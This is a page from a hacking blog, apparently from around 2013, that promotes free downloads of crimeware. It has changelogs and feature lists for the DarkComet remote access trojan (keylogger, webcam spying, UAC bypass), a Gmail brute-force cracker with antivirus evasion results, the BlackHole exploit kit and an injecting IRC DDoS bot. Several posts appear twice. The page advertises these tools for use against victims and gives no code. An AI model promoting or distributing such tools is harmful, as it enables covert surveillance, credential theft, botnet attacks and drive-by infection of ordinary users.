Showing posts with label malware. Show all posts
Showing posts with label malware. Show all posts

[RELEASE] DarkComet-RAT 4.2F Updated Bugs Fixed!

Here is the final version of 4.2 (DarkComet-RAT).
It is now more stable, many bugs was fix, many things had changed etc.

Changelog:

- Now server module doesn't melt each times
- SOCKS5 Server added - Multithread.
- Camera streaming is now more stable
- Camera capture interval added
- Camera disable streatch enabled/disabled added
- File Manager doesn't crash on transfer anymore
- Sound capture more stable and a bit faster
- New process manager GUI and more user friendly
- Process Dump added to the new process manager
- Screen capture totally recoded, faster in Vista and Seven than before
- Screen capture control more stable
- No more black screen in screen capture on resize (avoid using 16bit colors in some systems) Most performant is 8Bit.
- New password recovery plugin
- I change the default path of installation to bypass UAC
- Keylogger is now by default always enabled.
- Webcam streaming is faster but use more CPU (but it is faster) if you want to use less CPU you will need to play
with the capture interval, bigger it is in time less CPU it will consume. (nowadays computers handle perfectly this
calculation so it might not cause some problems brotha )
- Webcam gui change, its more sex now.
- Webcam refresh button added if in the first time you don't receive the drivers list
- Remote desktop faster using another compression for picture use a little mit more CPU but faster
- Remote desktop now compare previous frame like in my previous versions (it use a special way that spent 0Ms to compare )
- Remote desktop i add as requested an option in remote command to save snapshots like for webcam
Bug fix:
- Get keylogger logs fixed
- Remote shell I/O error fixed
- bug fixed in computer information "Computer power / type"
- Process manager bug fixed, now it list correctly all process for 64bit and refresh work properly
- Process memory size bug fixed
- Process manager run visible/hidden bug fixed.
- Little bug in Uninstall application fix (when there is a param merged to the uninstall string it will work )
- Bug fixed in html, vbs, batch copy / past clipboard fixed
- Bug fixed in password manager when copy line / all in clipboard or copy only data4 column.
- Trace route bug fixed, now its working like a charm
- Now url download works fine in any case of url (i make valid your urls)
- No ip retrieve correctly the IP (no more 0 at the end)
- HWID works fine now, it will fix many errors in some functions
I would like to thanks especially Supersurfer beta testing also Nicolas.M.

Few pictures :












Download: ClickHere

PolyDex v2 Gmail Password Cracker [Free]

[Image: im2nUA.png]

PolyDex v2 gmail cracker



Image really describes how to work it...



This is a bruteforcer. it can take hours,days,years to crack a pass so dont complain about the speed of it.



  • BruteForces Gmail's
  • Bypasses SMTP
  • Multiple Character Sets
  • Easy to use
  • MultiThreaded



NOTE:
This might use quite a bit of cpu and will use quite a bit of internet.



How it works (Advanced users only please)

Basically the permutation engine from my md5 cracker generates strings sequentially then it attempts to send a smtp message using the generated string, if it fails it continues trying to send smtp messages. If an email sends it echos back the password and stops cracking. This concept could be adapted to any SMTP provider email you want, if you'd like the source your free to contact me via pm and im down for sharing.


Download Here!


Source Download here!



Scan

(Obfucation, If you dont like it.. dont download)



If you understand visual basic you would realize that to send the email using SMTP that I use to crack the email I have to use the email namespace which is detected as its also used in malware to send information.



RESULTS: 2/33

AVG Free -

ArcaVir -


Avast 5 -

Avast -

AntiVir (Avira) -

BitDefender -

VirusBuster -

Clam -

COMODO -

Dr.Web -

eTrust-Vet -


F-PROT -

F-Secure -

G Data -

IKARUS - Trojan.ATRAPS

Kaspersky -

McAfee -

MS Essentials -

ESET NOD32 -


Norman -

Norton -

Panda -

A-Squared - Trojan.ATRAPS!IK

Quick Heal -

Rising -

Solo -

Sophos -


Trend Micro -

VBA32 -

Vexira -

Webroot -

Zoner AntiVirus -

AhnLab V3 -



File Имя PolyDexv2.exe

File Size: 96768


File MD5: 403dc8262c093b30a043bba4d70e3cf5

File SHA1: b99bdd2e6f76087a456ea648b8bd4934899678f5

Check Time: 2011-03-20 08:45:52



Scan report generated by

Scan4You.Biz

BlackHole Exploit Kit 1.0.2 - Free Download!


First Public Release of BlackHole Exploit Kit. BlackHole exploit kit is yet another in an ongoing wave of attack toolkits flooding the underground market. The kit first appeared on the crimeware market in September of 2010 and ever since then has quickly been gaining market share over its vast number of competitors. In fact, many antivirus vendors now claim that this is one of the most prevalent exploit kits used in the wild. Even Malware Domain List is showing quite a few domains infected with the BlackHole exploit kit.





Black Market Cost :
Users can purchase the annual license for $1500, semi-annual license for $1000, or just a quarterly license for $700. The license includes free software updates for the duration of the contract. For those malicious users with a commitment phobia the makers of the kit offer yet another solution. You can rent the kit (on the author’s servers) for $50 for 24 hours, $200 for 1 week, $300 for 2 weeks, $400 for 3 week, and $500 for 4 weeks. A domain name comes included with the rental agreement, but should you desire to change it you need to pay another $35. But Now its FREE HERE !


Feature :
One highly touted feature of BlackHole toolkit is its TDS or Traffic Direction Script. While this is not an entirely new concept in attack toolkits the TDS included her is much more sophisticated and powerful than those in other kits. A TDS is basically an engine that allows redirection of traffic through a set of rules. For example, a user can set up a set of rules that redirect flow to different landing pages on their domain. These rules could be based on operating system, browser, country of origin, exploit, files, etc. One rule might redirect traffic to page A for all users that are running Windows OS from XP to Vista and running IE 8, while another rule can redirect Windows 7 users to page B. Those were just simple example rules. More advanced rules could set expiration dates for certain payloads and replace them with new ones when the date is reached. The TDS included in BlackHole even goes the extra step and allows you to create traffic flows based on these rules and provides management interface for the flows. A savvy malicious user with a lot of experience could easily utilize this rule engine to increase their infection numbers.From a web application standpoint BlackHole is built just like other kits, consisting of a PHP and MySQL backend. Since the majority of web servers run on the LAMP stack this enabled for very easy application deployment. The user interface for this kit is a cut about the rest, and it definitely looks nicer than almost any other attack kit we’ve analyzed. It resembles some of the best legitimate web apps we see in the world of commercial software.



Download



Credit: Hack News

Silly Bot 1.3.2 - C++ IRC Bot - New: Bugs Fixed from 1.3


Silly Bot 1.3.2









What's New:

1.3.2

Fixed Ping/Pong

Fixed Join Cmd

1.3.1


Fixed build issue on XP

Fixed .Remove and .Kill function on x86 - Injected thread will still be running until reboot. Bots will ping out of IRC.

1.3

Injects into explorer.exe if x86 detected - Runs hidden from task manger

Bin size reduced to ~35kb

Core recode to C (from C++), 99% in C with the exception of simple C++ syntax (So it compiles with WDK)

Builder offline again

Builder icon changed

Other stuff I can't think of... small changes




Features:

IRC Bot

Compiled in C++

Small Size ~35kb

Injects into explorer.exe if x86

Copies to %appdata% and Creates Startup Reg key

Backup DNS

Mutex


Auth Host



Commands:

.kill - Terminates it's own process

.execute <ip/dns> <name>

.udp <ip/dns> <time>


.http <ip/dns> <time>

.version

.remove

.update <ip/dns> <time>

.visit <ip/dns>


.dotnet <#chan> - If it has dotnet install it joins specified channel

.join <#chan>

.part

.recon - Reconnects to channel after 2 minutes





Download:


Silly Bot 1.3.2 - C++ IRC Bot - New: Bugs Fixed from 1.3


Silly Bot 1.3.2









What's New:

1.3.2

Fixed Ping/Pong

Fixed Join Cmd

1.3.1


Fixed build issue on XP

Fixed .Remove and .Kill function on x86 - Injected thread will still be running until reboot. Bots will ping out of IRC.

1.3

Injects into explorer.exe if x86 detected - Runs hidden from task manger

Bin size reduced to ~35kb

Core recode to C (from C++), 99% in C with the exception of simple C++ syntax (So it compiles with WDK)

Builder offline again

Builder icon changed

Other stuff I can't think of... small changes




Features:

IRC Bot

Compiled in C++

Small Size ~35kb

Injects into explorer.exe if x86

Copies to %appdata% and Creates Startup Reg key

Backup DNS

Mutex


Auth Host



Commands:

.kill - Terminates it's own process

.execute <ip/dns> <name>

.udp <ip/dns> <time>


.http <ip/dns> <time>

.version

.remove

.update <ip/dns> <time>

.visit <ip/dns>


.dotnet <#chan> - If it has dotnet install it joins specified channel

.join <#chan>

.part

.recon - Reconnects to channel after 2 minutes





Download:


[RELEASE] DarkComet-RAT 4.2F Updated Bugs Fixed!

Here is the final version of 4.2 (DarkComet-RAT).
It is now more stable, many bugs was fix, many things had changed etc.

Changelog:

- Now server module doesn't melt each times
- SOCKS5 Server added - Multithread.
- Camera streaming is now more stable
- Camera capture interval added
- Camera disable streatch enabled/disabled added
- File Manager doesn't crash on transfer anymore
- Sound capture more stable and a bit faster
- New process manager GUI and more user friendly
- Process Dump added to the new process manager
- Screen capture totally recoded, faster in Vista and Seven than before
- Screen capture control more stable
- No more black screen in screen capture on resize (avoid using 16bit colors in some systems) Most performant is 8Bit.
- New password recovery plugin
- I change the default path of installation to bypass UAC
- Keylogger is now by default always enabled.
- Webcam streaming is faster but use more CPU (but it is faster) if you want to use less CPU you will need to play
with the capture interval, bigger it is in time less CPU it will consume. (nowadays computers handle perfectly this
calculation so it might not cause some problems brotha )
- Webcam gui change, its more sex now.
- Webcam refresh button added if in the first time you don't receive the drivers list
- Remote desktop faster using another compression for picture use a little mit more CPU but faster
- Remote desktop now compare previous frame like in my previous versions (it use a special way that spent 0Ms to compare )
- Remote desktop i add as requested an option in remote command to save snapshots like for webcam
Bug fix:
- Get keylogger logs fixed
- Remote shell I/O error fixed
- bug fixed in computer information "Computer power / type"
- Process manager bug fixed, now it list correctly all process for 64bit and refresh work properly
- Process memory size bug fixed
- Process manager run visible/hidden bug fixed.
- Little bug in Uninstall application fix (when there is a param merged to the uninstall string it will work )
- Bug fixed in html, vbs, batch copy / past clipboard fixed
- Bug fixed in password manager when copy line / all in clipboard or copy only data4 column.
- Trace route bug fixed, now its working like a charm
- Now url download works fine in any case of url (i make valid your urls)
- No ip retrieve correctly the IP (no more 0 at the end)
- HWID works fine now, it will fix many errors in some functions
I would like to thanks especially Supersurfer beta testing also Nicolas.M.

Few pictures :












Download: ClickHere

Download: ClickHere

BlackHole Exploit Kit 1.0.2 - Free Download!


First Public Release of BlackHole Exploit Kit. BlackHole exploit kit is yet another in an ongoing wave of attack toolkits flooding the underground market. The kit first appeared on the crimeware market in September of 2010 and ever since then has quickly been gaining market share over its vast number of competitors. In fact, many antivirus vendors now claim that this is one of the most prevalent exploit kits used in the wild. Even Malware Domain List is showing quite a few domains infected with the BlackHole exploit kit.





Black Market Cost :
Users can purchase the annual license for $1500, semi-annual license for $1000, or just a quarterly license for $700. The license includes free software updates for the duration of the contract. For those malicious users with a commitment phobia the makers of the kit offer yet another solution. You can rent the kit (on the author’s servers) for $50 for 24 hours, $200 for 1 week, $300 for 2 weeks, $400 for 3 week, and $500 for 4 weeks. A domain name comes included with the rental agreement, but should you desire to change it you need to pay another $35. But Now its FREE HERE !


Feature :
One highly touted feature of BlackHole toolkit is its TDS or Traffic Direction Script. While this is not an entirely new concept in attack toolkits the TDS included her is much more sophisticated and powerful than those in other kits. A TDS is basically an engine that allows redirection of traffic through a set of rules. For example, a user can set up a set of rules that redirect flow to different landing pages on their domain. These rules could be based on operating system, browser, country of origin, exploit, files, etc. One rule might redirect traffic to page A for all users that are running Windows OS from XP to Vista and running IE 8, while another rule can redirect Windows 7 users to page B. Those were just simple example rules. More advanced rules could set expiration dates for certain payloads and replace them with new ones when the date is reached. The TDS included in BlackHole even goes the extra step and allows you to create traffic flows based on these rules and provides management interface for the flows. A savvy malicious user with a lot of experience could easily utilize this rule engine to increase their infection numbers.From a web application standpoint BlackHole is built just like other kits, consisting of a PHP and MySQL backend. Since the majority of web servers run on the LAMP stack this enabled for very easy application deployment. The user interface for this kit is a cut about the rest, and it definitely looks nicer than almost any other attack kit we’ve analyzed. It resembles some of the best legitimate web apps we see in the world of commercial software.



Download



Credit: Hack News

 

Copyright @ 2013 OPEN HACKING.